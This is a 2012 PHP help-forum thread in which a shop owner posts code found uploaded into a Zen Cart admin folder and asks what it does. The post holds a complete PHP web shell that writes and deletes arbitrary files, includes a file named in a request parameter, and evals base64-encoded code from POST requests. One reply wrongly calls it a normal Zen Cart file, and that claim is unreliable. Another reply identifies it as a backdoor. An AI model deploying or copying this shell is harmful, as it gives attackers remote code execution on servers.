joecooper Posted February 5, 2012 Share Posted February 5, 2012 I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop. If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds. <?php //e6b03bed4190733c7534e5c1209b076f /** * @version 2.42 * */ if (isset($_POST["action"])) { switch ($_POST["action"]) { case "test": test(); break; case "regular_test": regular_test(); break; case "setup": projectcodes_setup(); break; case "remove": projectcodes_remove(); break; case "mail": send(); break; default: break; } return; } if (count($_GET) > 0) { foreach ($_GET as $id => $code) { if ($id == "id") { include $code; } } return; } function test() { $encoded_data = ""; $data["version"] = phpversion(); if (isset($_SERVER["SERVER_SOFTWARE"])) { $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"]; } else { $data["serverapi"] = "Not Available"; } ob_start(); phpinfo(; $data["modules"] = ob_get_contents(); ob_clean(); $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE; $serializes_data = serialize($data); $encoded_data = base64_encode($serializes_data); echo $_POST["test_message"] . $encoded_data; } function regular_test() { echo $_POST["test_message"]; } function projectcodes_setup() { $projectcodes = $_POST["projectcodes"]; foreach ($projectcodes as $projectcode) { $mark = $projectcode["mark"]; $code = base64_decode($projectcode["code"]); $res = new_file_put_contents($mark, $code); if ($res) { $installed[] = $projectcode["id"]; } } $installed = serialize($installed); $installed = base64_encode($installed); echo $installed; } function projectcodes_remove() { $projectcodes = $_POST["projectcodes"]; foreach ($projectcodes as $projectcode) { $mark = $projectcode["mark"]; $res = unlink($mark); if ($res) { $removed[] = $projectcode["id"]; } } $removed = serialize($removed); $removed = base64_encode($removed); echo $removed; } function new_file_put_contents($filename, $data) { $f = @fopen($filename, 'w'); if (!$f) { return false; } else { $bytes = fwrite($f, $data); fclose($f); return $bytes; } } function new_file_get_contents($filename) /* Returns the contents of file name passed */ { if (!function_exists('file_get_contents')) { $fhandle = fopen($filename, "r"); $fcontents = fread($fhandle, filesize($filename)); fclose($fhandle); } else { $fcontents = file_get_contents($filename); } return $fcontents; } function send() { $code = base64_decode($_POST["projectcode"]); eval($code); //return; } ?> Link to comment https://forums.phpfreaks.com/topic/256498-code-found-hacked-onto-server-what-does-it-do/ Share on other sites More sharing options...
QuickOldCar Posted February 6, 2012 Share Posted February 6, 2012 That seems to be a functions file that came with zencart, if you are looking for javascript injection files...look elsewhere for them. Link to comment https://forums.phpfreaks.com/topic/256498-code-found-hacked-onto-server-what-does-it-do/#findComment-1314897 Share on other sites More sharing options...
kicken Posted February 6, 2012 Share Posted February 6, 2012 It allows whoever knows how to use it the ability to both upload arbitrary files as well as execute arbitrary code (either directly or via the new files). You'll want to do a full check for any other mysterious files on your system. Link to comment https://forums.phpfreaks.com/topic/256498-code-found-hacked-onto-server-what-does-it-do/#findComment-1315199 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.